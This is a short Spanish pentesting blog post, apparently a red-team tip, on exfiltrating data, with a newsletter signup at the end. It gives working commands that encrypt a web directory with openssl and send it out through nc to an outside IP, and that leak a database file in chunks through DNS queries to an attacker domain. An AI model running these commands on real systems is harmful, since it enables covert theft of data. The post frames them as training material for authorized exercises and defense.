~ / blog / pentesting
KALI

Exfiltración de datos

En un ejercicio de red team, demostrar que puedes SACAR los datos es parte del impacto.

Si la salida directa está abierta, comprimes y envías por HTTP o SCP. Si está filtrada, escondes los datos en canales permitidos: dentro de consultas DNS, o en peticiones que parecen tráfico normal.

También cifras antes de sacar, para que no se detecte el contenido. Simular la exfiltración le enseña al equipo defensor qué monitorear.

Todo dentro del alcance autorizado del ejercicio.

# los comandos

www-data@victim:$ tar czf - /var/www/datos | openssl enc -aes-256-cbc -k clave | nc 10.0.0.50 443copiar
www-data@victim:$ # exfil por DNS: dividir en trozos base32 -> consultas a tu dominiocopiar
www-data@victim:$ for c in $(base64 -w40 secreto.db); do dig $c.exf.tudominio.co @tu-dns; donecopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.